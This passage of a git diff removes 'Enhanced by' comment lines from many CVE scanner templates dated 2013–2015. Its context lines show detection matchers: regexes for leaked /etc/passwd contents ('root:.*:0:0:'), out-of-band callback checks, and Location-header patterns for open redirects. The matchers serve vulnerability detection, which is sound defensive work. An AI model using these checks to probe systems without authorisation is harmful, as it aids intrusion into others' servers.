b/http/cves/2013/CVE-2013-3827.yaml index d2d6adac87..3d0ac72485 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -47,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/23 + diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 55504aac4e..9842b3ff36 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/23 + diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index c6dd632cf8..2a77929844 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 908f99f998..0c1da048ef 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 266dcce45a..239e830be5 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index a680b38686..c5ae470ee4 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -47,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 045943753c..38a7d720e4 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -43,4 +43,4 @@ http: regex: - "root=.*:0:0" -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 11eab76d8a..c4a107e772 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index cd151efaa9..ad768a8040 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -57,4 +57,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# Enhanced by md on 2023/04/12 + diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 0e5f1e2115..132aa4a1cb 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index e87a855774..1f21d85272 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/01 + diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index dc930653c2..dc698ee231 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/01 + diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index c1f9c4bf29..4886723676 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -32,4 +32,4 @@ http: regex: - "root:[x*]:0:0:" -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 77d8d99bd0..0202cb8a53 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -55,4 +55,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/06 + diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index e5a309b7e1..e7b53fb83c 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/23 + diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index c650d762b4..ce93609454 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/23 + diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index c48d236345..b287826108 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -62,4 +62,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 8627fdfb2e..093fc71fa7 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -37,4 +37,4 @@ http: words: - "http" -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 0a54df0161..985d38674c 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -46,4 +46,4 @@ http: status: - 500 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index c08fc34a0c..9b7732995a 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -33,4 +33,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 1c82fab373..f95b129be6 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -35,4 +35,4 @@ http: words: - "http" -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index a3f2c28365..0198340a24 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 36b6fef707..4d0be79d3d 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index fd7e733332..f28805090d 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 6789c78bb0..f0a2f1c098 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index fafa4450c9..52925b88b6 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index d6e28bbe34..1616b5f921 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 832a77be8a..baab0f8a38 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 40f6ff8be1..581b882a23 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 6bc482a627..4f3be0b863 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 6e707218af..991fbbcfee 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index d75c059a6b..a9f1d250ab 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -44,4 +44,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' -# Enhanced by mp on 2022/09/30 + diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index de1a49375f..591d931e90 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 + diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 610d23f495..7e89135ca2 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 4d5daf4594..62059c7893 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 2b632576a3..c955eabdd9 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -50,4 +50,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index b3fc584488..d624fa6266 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -52,4 +52,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/12 + diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 5e9001427d..bfb3e1f8f8 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 8a01476960..d83fd8d6e4 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by cs on 2022/09/09 + diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 2d3f2c64f7..3b375ac2bb 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/26 + diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 40621f0b3c..4cd8be2c63 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index b59f60d0ae..583ed03647 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 44d8db5751..2aff16e670 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/05 + diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index d1a43acb6d..3d8d74ad82 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index eac313ef85..3bc150c078 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 4718ef93d1..5cc2dd9a52 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 86920d09c6..8e4dbde27c 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index 92b4d0e953..59fa693dc6 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 987d370f90..bb60adca0d 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -48,4 +48,4 @@ http: words: - 'Set-Cookie: webadminU=' -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 1f165adf41..78030eda3d 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 7381e4248a..b18c6c499e 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -31,4 +31,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# Enhanced by mp on 2022/02/25 + diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index cc64203554..f6b4d9b339 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/10 + diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 3c0733df87..26661844ff 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 735e09b85c..4f5e3677ad 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/21 + diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 046be7d360..3c9417155e 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 80cabf7b4a..fb6c23a360 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/06 + diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 05206ca66a..9c0bcbc472 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -56,4 +56,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/11 + diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 7a30e38ea8..e6e40e943f 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/06 + diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 3bf2808a72..9c6e97b2b1 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index fe1b6beb96..76b71af819 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -41,4 +41,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 6c25aff9eb..0a61ff61c3 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index fbfb85b04a..c77f12399f 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index adcfc5fbbd..a6edad41a4 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -36,4 +36,4 @@ http: - "Illegal character 0x0 in state" part: body -# Enhanced by mp on 2022/04/21 + diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 7ae6bb612c..7dc15c4914 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 97179e8e4a..e890fd9ddc 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -37,4 +37,4 @@ http: - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# Enhanced by md on 2023/04/12 + diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index a2a65acab1..105829716d 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -48,4 +48,4 @@ http: - 'contains(body_2, "ab-google-map-travel")' condition: and -# Enhanced by md on 2023/03/13 + diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index a10ac51c1b..1552d8734c 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 2ff19761e5..7b396b3f74 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -32,4 +32,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 -# Enhanced by md on 2023/03/21 + diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 3532843519..00615aae13 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by md on 2023/02/22 + diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 1703df4634..269b8a173b 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/30 + diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index edaa2d8033..c37bbad0a2 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -45,4 +45,4 @@ http: case-insensitive: true condition: or -# Enhanced by mp on 2022/05/10 + diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 51f7c9d212..80e9e494dd 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index f17f30353b..ab429c22df 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 086b601333..e93879594a 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -40,4 +40,4 @@ http: regex: - "root:[x*]:0:0:" -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 15e7999f24..f07182c941 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 6ac4995fbf..3a53b0d30d 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -45,4 +45,4 @@ http: - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# Enhanced by md on 2023/03/13 + diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 5cd1a3595c..8774c715a7 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -43,4 +43,4 @@ http: - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# Enhanced by md on 2023/03/13 + diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 969f94188f..3aaf9fd654 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by cs on 2022/09/08 + diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 411334bf98..f23b10c05a 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/31 + diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 85ed92fa7a..d3e6d9a1ec 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 5c1210441d..7862722eba 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 2ebe8cc7cb..2127281d23 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/13 + diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 4024eaf344..56c7c5216f 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -31,4 +31,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/09/30 + diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index ddf2a1d13c..d5b5dc39f1 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 + diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 54ceb93a2f..5b46d68c01 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -30,4 +30,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 03946dca03..d391bbf751 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -31,4 +31,4 @@ http: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header -# Enhanced by mp on 2022/09/30 + diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 31ec62651f..0991255cd4 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/30 + diff --git 